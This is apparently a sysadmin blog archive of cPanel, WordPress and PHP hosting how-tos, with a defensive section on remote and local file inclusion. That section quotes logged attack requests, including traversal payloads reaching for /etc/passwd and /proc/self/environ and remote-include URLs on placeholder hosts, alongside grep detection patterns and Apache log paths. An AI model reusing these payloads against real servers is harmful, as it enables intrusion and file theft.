Monday, June 1, 2015

How to Reset a Wordpress Password

If you have forgotten your WordPress credentials, or your WordPress install has been compromised, you may need to change the admin username and/or password to regain access to your site.

Reset a User's password through MySQL
  • Log in to your WordPress database using MySQL's command line interface
  • Find the ID of the user whose password you want to change
SELECT ID, user_login, user_pass FROM wp_users;
  • Change that user's password to a new one, putting the ID from the previous query in place of usersID
UPDATE wp_users SET user_pass=MD5('newstrongpassword') WHERE ID = usersID;
WordPress accepts an MD5 value in user_pass and replaces it with its own stronger hash the first time that user logs in, so log in soon after the reset. If the table prefix was changed in wp-config.php ($table_prefix), use that prefix instead of wp_. If the site was compromised, also check the other rows returned by the SELECT for accounts you did not create.

Reset a User's Password through phpMyAdmin

If you have Plesk or cPanel, phpMyAdmin should be included by default. Open it for the domain and database that your WordPress site belongs to. If you don't remember the database name, look in your wp-config.php for a line similar to this:
define('DB_NAME', 'wordpress_blog');
In this example, "wordpress_blog" is the name of the database.
  • Once you're logged in to phpMyAdmin, click on the wp_users table.
  • Make sure you are on the Browse screen
  • Find the username you want to change the password for
  • Click Edit on that row
  • Enter your new password in the Value field of the user_pass line
  • Select "MD5" from the dropdown under the Function column for the user_pass line
  • Click Go at the bottom of the screen; you should then be able to log in with the new password

How to change the primary IP address of a cPanel server

Log in to SSH and do the following:

  • Edit /etc/sysconfig/network-scripts/ifcfg-eth0
    Change the IPADDR and GATEWAY lines to match the new IP and the gateway for the new IP.
  • Edit /etc/sysconfig/network
    Change the GATEWAY line here if it does not exist in the ifcfg-* file.
  • Edit /etc/ips
    Remove the new primary IP from this file if it is present.
    Add the old primary IP to this file with the format ::
  • Edit /var/cpanel/mainip
    Replace the old primary IP with the new primary IP.
  • Edit /etc/hosts
    Replace the old primary IP with the new one if needed. The hostname's DNS record will need to be updated too.
  • Restart the network service to make the new IP the primary:
service network restart
    Note: you will probably be disconnected at this point and have to log in to SSH again using the new primary IP.
  • Restart the ipaliases script to bring up the additional IPs:
service ipaliases restart
  • Run ifconfig and make sure all IPs show up correctly.
  • Update the cPanel license to the new primary IP.
  • Verify cPanel: make sure you can still log in to WHM and that there is no license warning.
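Several of the steps above are "replace the old primary IP with the new one" in a config file. The example below (added here; it is not part of the original post or a cPanel tool) does that substitution while matching whole addresses only, so an old IP like 10.0.0.1 is never rewritten inside 10.0.0.10 or 110.0.0.1, and it keeps a .bak copy of each file. The addresses and the file it operates on are constructed placeholders; on a real server you would point replace_ip at /etc/sysconfig/network-scripts/ifcfg-eth0, /etc/hosts and /var/cpanel/mainip.

```shell
#!/bin/sh
# Added example, not part of the original post: swap one IPv4 address for
# another in a config file, but only where the whole address matches, so that
# the old primary IP is never rewritten inside a longer address such as
# 10.0.0.10 or 110.0.0.1. The addresses and file below are placeholders.

# replace_ip OLD NEW FILE
# Rewrites every whole-address occurrence of OLD with NEW in FILE, keeping a
# FILE.bak copy. Returns non-zero if FILE does not exist.
replace_ip() {
    old="$1"; new="$2"; file="$3"
    [ -f "$file" ] || { echo "replace_ip: $file not found" >&2; return 1; }
    cp -p "$file" "$file.bak"
    awk -v old="$old" -v new="$new" '
    {
        out = ""; rest = $0
        # walk the line one dotted-quad at a time and compare the full token,
        # so a substring match like 10.0.0.1 inside 10.0.0.10 is left alone
        while (match(rest, /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/)) {
            tok = substr(rest, RSTART, RLENGTH)
            if (tok == old) tok = new
            out = out substr(rest, 1, RSTART - 1) tok
            rest = substr(rest, RSTART + RLENGTH)
        }
        print out rest
    }' "$file.bak" > "$file"
}

# count_ip IP FILE -> number of lines in FILE containing IP as a whole address
# (use it to verify the result before restarting the network service)
count_ip() {
    awk -v ip="$1" '
    {
        rest = $0
        while (match(rest, /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/)) {
            if (substr(rest, RSTART, RLENGTH) == ip) { n++; break }
            rest = substr(rest, RSTART + RLENGTH)
        }
    }
    END { print n + 0 }' "$2"
}

# Demo on a constructed ifcfg-style file standing in for the real cPanel files.
demo_ip_swap() {
    tmp="${TMPDIR:-/tmp}/ifcfg-demo.$$"
    printf 'IPADDR=10.0.0.1\nGATEWAY=10.0.0.254\nALIAS=10.0.0.10\n' > "$tmp"
    replace_ip 10.0.0.1 192.0.2.10 "$tmp"
    cat "$tmp"    # IPADDR is now 192.0.2.10, ALIAS is still 10.0.0.10
    rm -f "$tmp" "$tmp.bak"
}

demo_ip_swap
```

Run replace_ip once per file, then count_ip OLD FILE should print 0 and count_ip NEW FILE at least 1 before you run service network restart; the .bak copies let you roll back if the box becomes unreachable.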

Tuesday, May 19, 2015

Linux Crontab

Linux Cron utility is an effective way to schedule a routine background job at a specific time and/or day on an on-going basis.

Linux Crontab Format

MIN HOUR DOM MON DOW CMD
 *    *    *   *   *  command

Table: Crontab Fields and Allowed Ranges (Linux Crontab Syntax)

Field   Description     Allowed Value
MIN     Minute field    0 to 59
HOUR    Hour field      0 to 23
DOM     Day of Month    1-31
MON     Month field     1-12
DOW     Day Of Week     0-6 (0 = Sunday)
CMD     Command         Any command to be executed.
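A crontab line with a field outside these ranges is rejected by crontab(1), but a script that writes cron entries (a backup installer, a deployment job) should check them before that point. The validator below is an added example, not part of the original post; it checks the five time fields against the table above, accepts "*", a single number or an N-M range per field, and deliberately reports list and step syntax ("1,15", "*/5") as invalid because those forms are not covered by the table.

```shell
#!/bin/sh
# Added example, not part of the original post: validate the five time fields
# of a crontab line against the ranges in the table above before installing
# it. It accepts "*", a single number and an N-M range per field; list and
# step syntax ("1,15", "*/5") is reported as invalid here.

# in_range VALUE LOW HIGH -> 0 if VALUE is an integer with LOW <= VALUE <= HIGH
in_range() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;    # empty or not purely numeric
    esac
    [ "$1" -ge "$2" ] && [ "$1" -le "$3" ]
}

# check_field FIELD LOW HIGH NAME -> 0 if FIELD is valid for this column
check_field() {
    f="$1"; lo="$2"; hi="$3"; name="$4"
    case "$f" in
        '*')  return 0 ;;
        *-*)  in_range "${f%-*}" "$lo" "$hi" && in_range "${f#*-}" "$lo" "$hi" \
                  && [ "${f%-*}" -le "${f#*-}" ] && return 0 ;;
        *)    in_range "$f" "$lo" "$hi" && return 0 ;;
    esac
    echo "$name field '$f' is not '*', a number or a range within $lo-$hi" >&2
    return 1
}

# validate_cron "MIN HOUR DOM MON DOW CMD..." -> 0 if every time field is valid
validate_cron() {
    # read splits on whitespace without pathname expansion, so a literal * is safe
    read -r min hour dom mon dow cmd <<EOF
$1
EOF
    [ -n "$cmd" ] || { echo "need five time fields followed by a command" >&2; return 1; }
    check_field "$min"  0 59 MIN  &&
    check_field "$hour" 0 23 HOUR &&
    check_field "$dom"  1 31 DOM  &&
    check_field "$mon"  1 12 MON  &&
    check_field "$dow"  0 6  DOW
}

validate_cron "30 2 * * 1 /usr/local/bin/backup.sh" && echo "ok: weekly backup line"
validate_cron "60 2 * * 1 /usr/local/bin/backup.sh" || echo "rejected: minute 60"
```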




Friday, November 14, 2014

Remote File Inclusion (RFI) attacks

Remote File Inclusion (RFI) is a technique used to attack web applications from a remote computer. It allows an attacker to run their own code on a vulnerable web server by getting the application to include code from a URL on a remote server. When the application executes that code, it may lead to a backdoor or to disclosure of technical information. This is an application vulnerability caused by insufficient validation of user input.



Mitigations:
  • Disable allow_url_fopen in php.ini by setting it to 0 (Off)
  • Enable safe_mode and set open_basedir restrictions (if you know what you're doing - it's not really that safe; note that safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4, while open_basedir is still available)
  • Lock down the server environment to prevent the server from making new outbound requests

Using Apache mod_rewrite is also an effective measure against RFI attacks. To use it, add the following lines to your .htaccess:

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*) [NC]
RewriteRule ^(.+)$ - [F,L]

The RewriteCond matches any query string containing a URL scheme (NC makes the match case-insensitive, so HTTP:// is caught as well), and the RewriteRule decides what happens to a matching request: the F flag answers with 403 Forbidden and the L flag stops further rewriting. Be aware that this also blocks legitimate requests whose query string carries a URL, such as a redirect or share parameter, so test it against your application before relying on it.

There are two php.ini options you can set, which control different aspects of file handling and work to prevent RFI:

allow_url_fopen=off
allow_url_include=off

allow_url_include is the one that governs include/require of URLs (it has defaulted to off since it was introduced in PHP 5.2); allow_url_fopen additionally stops fopen() and similar functions from opening remote URLs.

The magic_quotes directives represent PHP functionality that automatically escapes quotes passed by the user to the application. For example, in php.ini, set magic_quotes_gpc=On to automatically escape all single and double quotes, backslashes and NULLs with a backslash in GET, POST and cookie data. The other magic quote directive (magic_quotes_runtime=On) escapes quotes for a select list of functions. Both were deprecated in PHP 5.3 and removed in PHP 5.4, so they are only available on older PHP builds.

Apache log poisoning with LFI

Apache normally uses two log files: access_log, which contains all valid requests to the web server, and error_log, which contains error messages. Common locations, depending on the distribution and build:

/etc/httpd/logs/, /opt/lampp/logs/, /usr/local/apache/log, /usr/local/apache/logs/, /usr/local/etc/httpd/logs/, /usr/local/www/logs/thttpd_log, /var/apache/logs/, /var/log/apache/, /var/log/apache-ssl/, /var/log/httpd/, /var/log/httpsd/ssl.access_log

An LFI can only include a log file that the web server process is able to read, so keeping these files owned by root with restrictive permissions (Apache opens its logs before dropping privileges) limits this attack, as does blocking traversal and remote includes as described above.


RFI Detection

Just a few commands to find out who's knocking. Feel free to expand on what's here as new RFI attacks are discovered.


grep -hr '\.\.\/\.\.\/' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

grep -hr '\/etc\/passwd' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

Real World Output (target domain omitted to protect the innocent):
~~~~~~~~~~~
208.158.248.5 - example.com - "//lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
207.191.225.14 - example.com - "/ssa-pampanga-pg-wisdom-v-13xSmAeUo2o.html/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
207.191.225.14 - example.com - "/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
67.207.138.14 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
21.26.32.199 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
~~~~~~~~~~~




grep -hr 'SERVEQDOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

207.191.225.14 - example.com - "/?_SERVEQDOCUMENT_ROOT=http://www.some-RFI-rooted-site.or.kr/bbs/data/zfxid1.txt?"

grep -hr 'DOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

21.206.20.162 - example.com - "///?_SERVER[DOCUMENT_ROOT]=http://some-RFI-rooted-site.ca/bbs//nyawa.txt??"
10.45.14.165 - example.com - "/%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.some-RFI-rooted-site.com.au/nGagLiks/myfiles/zfxid1.txt?"

grep -hr '\.txt??' /usr/local/apache/logs/*_log | grep -v '\/robots.txt' | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

10.45.14.165 - example.com - "//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://some-RFI-rooted-site.co.kr/plugins/logs/gue/fx29id.txt??"
21.206.20.162 - example.com - "/ashop/catalogue.php?cat=http://www.some-RFI-rooted-site.com//pdf/1.txt??"
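The grep pipelines above each look for one pattern and depend on the exact log layout. The script below is an added example (not from the original post) that applies the same patterns in one pass over a constructed log file so it can be run offline: directory traversal, /etc/passwd, /proc/self/environ, a URL passed as a parameter value (the RFI signature itself) and the trailing-?? .txt payloads seen in the output above. The log format is an assumption made for the demo: client IP first, virtual host second, then the usual combined-log fields, so the request path is field 7; on a stock cPanel domlog field 2 is just "-". URL-encoded variants (%2e%2e%2f) are not decoded before matching, so this catches the plain forms only.

```shell
#!/bin/sh
# Added example, not part of the original post: the same pattern matching the
# grep pipelines above do, applied to a constructed log file so it runs
# offline. Each printed line is "IP - host - request", like the post's output.
# Assumed (constructed) log format: client IP, virtual host, then the usual
# combined-log fields, so the request path and query string is field 7.
# Limitation: URL-encoded variants (%2e%2e%2f) are not decoded before matching.

# make_demo_log -> writes a small constructed log and prints its path
make_demo_log() {
    f="${TMPDIR:-/tmp}/rfi-demo.$$.log"
    cat > "$f" <<'EOF'
198.51.100.7 example.com - [14/Nov/2014:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 example.com - [14/Nov/2014:10:00:02 +0000] "GET /robots.txt HTTP/1.1" 200 40 "-" "Mozilla/5.0"
203.0.113.9 example.com - [14/Nov/2014:10:01:00 +0000] "GET /?pg=../../../../../../proc/self/environ HTTP/1.0" 404 210 "-" "libwww-perl/5.8"
203.0.113.9 example.com - [14/Nov/2014:10:01:01 +0000] "GET /admin/index.php?_SERVER[ConfigFile]=../../../../etc/passwd HTTP/1.0" 404 210 "-" "libwww-perl/5.8"
203.0.113.10 example.com - [14/Nov/2014:10:02:00 +0000] "GET /catalogue.php?cat=http://attacker.invalid/1.txt?? HTTP/1.0" 404 210 "-" "-"
EOF
    echo "$f"
}

# scan_log FILE -> prints "IP - host - request" for each suspicious request
scan_log() {
    awk '
    # $1 client IP, $2 virtual host, $7 request path and query string.
    # Patterns: directory traversal, /etc/passwd, /proc/self/environ,
    # a URL passed as a parameter value, and a remote .txt payload with "??".
    $7 ~ /\.\.\// ||
    $7 ~ /\/etc\/passwd/ ||
    $7 ~ /proc\/self\/environ/ ||
    $7 ~ /=(https?|ftp):\/\// ||
    $7 ~ /\.txt\?\?$/ {
        printf "%s - %s - \"%s\"\n", $1, $2, $7
    }' "$1"
}

# suspect_ips FILE -> "count IP" per source address, most active last
suspect_ips() {
    scan_log "$1" | awk '{ print $1 }' | sort | uniq -c | sort -n
}

log="$(make_demo_log)"
scan_log "$log"       # three of the five demo lines are flagged
suspect_ips "$log"    # 203.0.113.9 has two hits, 203.0.113.10 one
rm -f "$log"
```

To run it against real logs, call scan_log on each domlog in turn (for f in /usr/local/apache/logs/*_log; do scan_log "$f"; done) and feed the output to the same sort | uniq -c step; the per-IP counts are what you would hand to CSF or a firewall rule.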


With such a vulnerability, attackers can execute any binary on the server, for example starting a telnet server, logging in to it with the privileges of the web server user, running exploits to gain root access, and perhaps attacking other hosts that are reachable from the compromised server.


Reference

https://documentation.cpanel.net/display/CKB/PHP+Security+Concepts

Wednesday, November 12, 2014

Linux command verifying CMS version on cPanel server

WordPress version:

find /home/*/public_html/ -type f -iwholename "*/wp-includes/version.php" -exec grep -H "\$wp_version =" {} \;

Joomla! 1/2/3 version and release:
Linux/cPanel:
find /home/*/public_html/ -type f \( -iwholename '*/libraries/joomla/version.php' -o -iwholename '*/libraries/cms/version.php' -o -iwholename '*/libraries/cms/version/version.php' \) -print -exec perl -e 'while (<>) { $release = $1 if m/ \$RELEASE\s+= .([\d.]+).;/; $dev = $1 if m/ \$DEV_LEVEL\s+= .(\d+).;/; } print qq($release.$dev\n);' {} \; && echo "-"

Drupal version
Linux/cPanel:
find /home/*/public_html/ -type f -iwholename "*/modules/system/system.info" -exec grep -H "version = \"" {} \;
Linux/Plesk:
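The find commands above print the whole matching line; when you are comparing dozens of accounts against the current release it helps to extract just the version. The function below is an added example, not part of the original post: it walks a root directory for WordPress and Drupal version files and prints "path: version", parsing the value out of $wp_version = '...' and version = "..." respectively. It uses POSIX find -path rather than the GNU -iwholename used above, and the directory tree is constructed in a temp dir so the demo runs offline.

```shell
#!/bin/sh
# Added example, not part of the original post: the find-and-grep idea above
# as a function that prints "path: version" for every WordPress and Drupal
# install under a root, parsing the version out instead of printing the whole
# line. Uses POSIX find -path (case-sensitive) instead of GNU -iwholename.

# cms_versions ROOT -> "path: version" per version file found under ROOT
cms_versions() {
    find "$1" -type f \( -path '*/wp-includes/version.php' \
                      -o -path '*/modules/system/system.info' \) -print |
    while IFS= read -r f; do
        v=""
        case "$f" in
            # WordPress: $wp_version = '4.2.2';
            *version.php) v=$(sed -n "s/^\$wp_version *= *'\([^']*\)'.*/\1/p" "$f") ;;
            # Drupal 6/7: version = "7.31"
            *system.info) v=$(sed -n 's/^version *= *"\([^"]*\)".*/\1/p' "$f") ;;
        esac
        echo "$f: ${v:-unknown}"
    done | sort
}

# make_demo_tree DIR -> constructed account layout with one WordPress and one
# Drupal install (the versions are made-up sample values)
make_demo_tree() {
    mkdir -p "$1/blog/public_html/wp-includes" "$1/drupal/public_html/modules/system"
    printf "<?php\n\$wp_version = '4.2.2';\n" > "$1/blog/public_html/wp-includes/version.php"
    printf 'name = System\nversion = "7.31"\n' > "$1/drupal/public_html/modules/system/system.info"
}

d="${TMPDIR:-/tmp}/cms-demo.$$"
make_demo_tree "$d"
cms_versions "$d"    # one line per install, e.g. .../wp-includes/version.php: 4.2.2
rm -rf "$d"
```

On a cPanel box call cms_versions /home and diff the output against the versions you expect; an "unknown" entry means the file exists but no longer matches the pattern, which is worth a manual look.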

Friday, October 31, 2014

How to prevent DoS attack on a cPanel server

Check and block WordPress and xmlrpc attacks on a cPanel server

If you are seeing a lot of access to wp-login.php, you can conclude it is a WordPress attack. The script below shows a sorted list of the IPs accessing wp-login:

egrep 'wp-login.php' /usr/local/apache/domlogs/* | grep -v ftp_log | awk -F : '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n

We can get the IPs hitting xmlrpc.php on a given day from the access logs with the script below (replace xx with the day of the month):

grep -r "xx/Aug/2014" /usr/local/apache/domlogs/ | grep "xmlrpc.php" | awk '{ print $1 }' | cut -d : -f2 | sort | uniq -c | sort -n > /root/testwp

The same for wp-login.php within a single hour:

grep wp-login.php /usr/local/apache/domlogs/* | grep "16/Jan/2013:03" | awk '{print $1}' | cut -d: -f2 | sort | uniq -c | sort -n | tail
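The pipelines above all reduce to "count requests for one URL per client IP and look at the top of the list"; the cut -d: step exists only because grep prefixes each line with the file name. The script below is an added example (not from the original post) that does the same counting with awk across several domlog files and makes the threshold explicit, so the output is a list of addresses you can hand to csf -d or review by hand. The log lines and file names are constructed for the demo in the usual combined format (IP in field 1, request path in field 7), standing in for /usr/local/apache/domlogs/*.

```shell
#!/bin/sh
# Added example, not part of the original post: count requests per client IP
# for a given URL (wp-login.php or xmlrpc.php) across several domlog files and
# report the addresses at or over a threshold, which is what the sort|uniq -c
# pipelines above do with the threshold made explicit. The log lines are
# constructed for this demo in combined format (IP is field 1, request path is
# field 7); the file names stand in for /usr/local/apache/domlogs/*.

# hits_per_ip PATH FILE... -> "count IP" lines, lowest count first
# (matches requests whose path starts with PATH, so ?redirect_to=... is counted)
hits_per_ip() {
    path="$1"; shift
    awk -v p="$path" 'index($7, p) == 1 { n[$1]++ } END { for (ip in n) print n[ip], ip }' "$@" | sort -n
}

# over_threshold N PATH FILE... -> IPs with at least N requests for PATH
over_threshold() {
    limit="$1"; shift
    hits_per_ip "$@" | awk -v t="$limit" '$1 >= t { print $2 }'
}

# make_demo_logs DIR -> two constructed domlog files: one IP hammering
# wp-login.php and xmlrpc.php, one normal user logging in once
make_demo_logs() {
    mkdir -p "$1"
    i=0
    while [ "$i" -lt 6 ]; do
        echo "203.0.113.5 - - [31/Oct/2014:03:1$i:00 +0000] \"POST /wp-login.php HTTP/1.1\" 200 3000 \"-\" \"-\"" >> "$1/example.com"
        i=$((i + 1))
    done
    echo '198.51.100.8 - - [31/Oct/2014:03:20:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"' >> "$1/example.com"
    echo '198.51.100.8 - - [31/Oct/2014:03:21:00 +0000] "POST /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"' >> "$1/example.com"
    echo '203.0.113.5 - - [31/Oct/2014:03:30:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400 "-" "-"' >> "$1/other.example"
    echo '203.0.113.5 - - [31/Oct/2014:03:30:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400 "-" "-"' >> "$1/other.example"
}

dir="${TMPDIR:-/tmp}/domlogs-demo.$$"
make_demo_logs "$dir"
hits_per_ip /wp-login.php "$dir"/*        # 2 198.51.100.8 / 6 203.0.113.5
over_threshold 5 /wp-login.php "$dir"/*   # 203.0.113.5
rm -rf "$dir"
```

Pick the threshold from what your own logs show for a normal login hour; a real user rarely posts to wp-login.php more than a handful of times, while a brute-force client produces hundreds.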



CSF tuning

vi /etc/csf/csf.conf
----
# To disable this feature, set this to 0
CT_LIMIT = "50"
----

Where 50 is the maximum number of connections allowed from a single IP address before it is blocked. You also need to specify which ports to count:

vi /etc/csf/csf.conf
----
# Leave this option empty to count all ports against CT_LIMIT
CT_PORTS = "80,53,22"
----

Other CT options can be tuned as well: CT_INTERVAL is the number of seconds between connection tracking scans, and CT_BLOCK_TIME is how many seconds an offending IP stays blocked.

CT_INTERVAL = "30"
CT_BLOCK_TIME = "1800"



IPTable rule:

iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT

------------------------
-A : Append to the chain (INPUT)
-p : Protocol
--dport : Destination port
-m limit : Use the limit match extension
--limit 25/minute : Defines a maximum of 25 connections per minute.
--limit-burst 100 : The limit/minute is enforced only after the total number of connections has reached the limit-burst level, i.e. 100 here
-j : Target
--------------------------

On its own this rule only ACCEPTs the packets that fit within the limit; anything above it falls through to the rest of the INPUT chain, so it needs a later rule that drops port 80 traffic (or a DROP default policy) to have any effect. The limit match counts packets, not connections; add --syn to the rule so that only new connection attempts are counted.






Wednesday, August 27, 2014

Running Multiple PHP 5 Versions

cPanel does not support this directly through EasyApache.

To my knowledge you either need to do this manually or use CloudLinux, which offers an addon for this purpose.

For CloudLinux please follow the steps below.

http://docs.cloudlinux.com/index.html?installation.html

NB: You must have CageFS and LVE Manager installed for this to work

http://docs.cloudlinux.com/index.html?cagefs.html

Recompile and install the default PHP (Optional)

If the existing installation is fine and has the necessary modules, you can skip this step. Otherwise you need to recompile it using:

/scripts/easyapache

Once it is done, you can proceed with the new PHP 5.4.14.


Step 1:

Download the source file

mkdir /usr/local/src/php_source
cd /usr/local/src/php_source
wget http://in2.php.net/get/php-5.4.8.tar.gz/from/us1.php.net/mirror

Extract the source (the archive name must match the file you actually downloaded):
tar -xvf php-5.4.14.tar.bz2

You can get the configuration options for the new install from the existing installation using the following command:
php -i | grep configure | sed 's/Configure Command =>  //g' | sed "s/'//g"

Once you have it, modify it: make sure the installation path --prefix is specified and that PHP is built as CGI using the option --enable-cgi. In this case I am using the installation path --prefix=/usr/local/php54.
Make sure to remove the configuration parameter for apxs, i.e. --with-apxs2=/usr/local/apache/bin/apxs
The final configuration options for the new install will look like the following:

./configure  --disable-fileinfo --disable-phar --enable-bcmath --enable-calendar --enable-libxml --enable-mbstring --enable-pdo=shared --enable-soap --enable-sockets --enable-wddx --enable-zend-multibyte --enable-zip --prefix=/usr/local/php54 --enable-cgi --with-bz2 --with-curl=/opt/curlssl/ --with-curlwrappers --with-freetype-dir=/usr --with-gd --with-gettext --with-imap=/opt/php_with_imap_client/ --with-imap-ssl=/usr --with-jpeg-dir=/usr --with-kerberos --with-libdir=lib64 --with-libexpat-dir=/usr --with-libxml-dir=/opt/xml2/ --with-mcrypt=/opt/libmcrypt/ --with-mm=/opt/mm/ --with-mysql=/usr --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=/usr/bin/mysql_config --with-openssl=/usr --with-openssl-dir=/usr --with-pcre-regex=/opt/pcre --with-pdo-mysql=shared --with-pdo-sqlite=shared --with-pic --with-png-dir=/usr --with-pspell --with-tidy=/opt/tidy/ --with-xmlrpc --with-xpm-dir=/usr --with-xsl=/opt/xslt/ --with-zlib --with-zlib-dir=/usr

Once the configuration is complete, compile using the following command:

make

Now proceed with the installation:

make install

Once the installation is complete you will get output like the following:

# make install
Installing shared extensions:     /usr/local/php54/lib/php/extensions/no-debug-non-zts-20100525/
Installing PHP CLI binary:        /usr/local/php54/bin/
Installing PHP CLI man page:      /usr/local/php54/php/man/man1/
Installing PHP CGI binary:        /usr/local/php54/bin/

Once the installation is completed, confirm the version by using the command

#  /usr/local/php54/bin/php -v
PHP 5.4.14 (cli) (built: May  3 2013 12:21:56)
Copyright (c) 1997-2013 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2013 Zend Technologies

Now we need to configure it for web server access.

This is done by specifying the new PHP handler for .php files.

AddHandler is meant to communicate with the server: it assigns or "maps" a handler to the file extension you specify, giving the server instructions on how to deal with it. For example, AddHandler could be used to activate a particular file type, which is why it must communicate with the server.

Eg:

AddHandler application/x-httpd-php54 .php
The AddHandler directive tells Apache that whenever it encounters a file with a .php extension, it should mark it as having a MIME type of application/x-httpd-php54.

Action application/x-httpd-php54 /cgi-sys/php54
The Action directive tells Apache that whenever it encounters a file of type application/x-httpd-php54 it should pass it to the script /cgi-sys/php54 and capture the output.

Assume that you are working on a default cPanel server.

Open the file /usr/local/apache/conf/includes/pre_virtualhost_global.conf, add the following lines to enable the handler, and save:

Action application/x-httpd-php54 /cgi-sys/php54
AddType application/x-httpd-php54 .php54

To make cPanel skip the .htaccess scan and the removal of these MIME types, do the following:

/usr/local/cpanel/bin/apache_conf_distiller --update
touch /var/cpanel/easy_skip_update_php_mime_types

vi /usr/local/cpanel/cgi-sys/php54
Add the following contents to the above file and save:
#!/bin/sh
exec /usr/local/php54/bin/php-cgi

Setting permissions:
chown root:wheel /usr/local/cpanel/cgi-sys/php54
chmod +x /usr/local/cpanel/cgi-sys/php54

Soft-linking for command-line executions:
ln -s /usr/local/php54/bin/php-cgi /usr/local/bin/php54

Copying php.ini from the build folder (the source tree extracted in Step 1):
cp /usr/local/src/php_source/php-5.4.14/php.ini-production /usr/local/php54/lib/php.ini

You need to restart httpd after the configuration:
/etc/init.d/httpd restart

Now everything is set. If you want to enable PHP 5.4 for a particular account, create a .htaccess file as shown below.

nano -w /home/$username/public_html/.htaccess
AddHandler application/x-httpd-php54 .php

chown $username:$username /home/$username/public_html/.htaccess
chmod 644 /home/$username/public_html/.htaccess